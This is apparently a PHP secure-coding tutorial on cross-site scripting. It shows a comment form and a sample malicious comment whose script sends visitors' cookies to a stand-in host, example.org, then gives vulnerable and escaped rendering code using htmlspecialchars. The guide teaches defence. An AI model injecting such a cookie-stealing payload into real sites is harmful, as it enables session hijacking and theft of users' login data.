Cross-site scripting (XSS) is one of the most common and best known kinds of attacks. The simplicity of this attack and the number of vulnerable applications in existence make it very attractive to malicious users.
An XSS attack exploits the user's trust in the application and is usually an effort to steal user information, such as cookies and other personally identifiable data. All applications that display input are at risk. Consider the following form, for example.

    <form method="POST" action="process.php">
        <p>Add a comment:</p>
        <p><textarea name="comment"></textarea></p>
        <p><input type="submit" /></p>
    </form>

This form might exist on any of a number of popular community websites that exist today, and it allows a user to add a comment to another user's profile. After submitting a comment, the page displays all of the comments that were previously submitted, so that everyone can view all of the comments left on the user's profile.

Imagine that a malicious user submits a comment on someone's profile that contains the following content:

    <script>
    document.location = "http://example.org/getcookies.php?cookies=" + document.cookie;
    </script>

Now, everyone visiting this user's profile will be redirected to the given URL and their cookies (including any personally identifiable information and login information) will be appended to the query string. The attacker can easily access the cookies with $_GET['cookies'] and store them for later use. This attack works only if the application fails to escape output. Thus, it is easy to prevent this kind of attack with proper output escaping.
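The comment display described above, written as an added example rather than code from the original guide: the vulnerable version echoes each stored comment straight into the page, while the corrected version escapes it for an HTML body context with htmlspecialchars. The $comments array, including the malicious comment from the text, is constructed here for illustration.

```php
<?php
// Constructed sample comments as they might be stored after submission,
// including the malicious comment shown above.
$comments = [
    'Nice profile!',
    '<script>document.location = "http://example.org/getcookies.php?cookies="'
        . ' + document.cookie;</script>',
];

// Vulnerable: the raw comment is concatenated into the HTML, so the browser
// treats the <script> element as markup and executes it for every visitor.
function renderCommentsUnsafe(array $comments): string
{
    $html = '';
    foreach ($comments as $comment) {
        $html .= '<p>' . $comment . '</p>';
    }
    return $html;
}

// Fixed: every comment is escaped at the point of output. htmlspecialchars
// converts <, >, &, " and (with ENT_QUOTES) ' into HTML entities, so the
// malicious comment is displayed as text instead of being parsed as markup.
// The charset argument must match the charset the page is served with.
function renderCommentsSafe(array $comments): string
{
    $html = '';
    foreach ($comments as $comment) {
        $html .= '<p>' . htmlspecialchars($comment, ENT_QUOTES, 'UTF-8') . '</p>';
    }
    return $html;
}

// Self-check: no raw <script> tag survives in the escaped output.
assert(strpos(renderCommentsSafe($comments), '<script') === false);
assert(strpos(renderCommentsUnsafe($comments), '<script') !== false);

echo renderCommentsSafe($comments);
```

Escaping must be applied at output time and chosen for the context the data lands in; htmlspecialchars is correct for HTML body text, not for JavaScript strings or URL parameters.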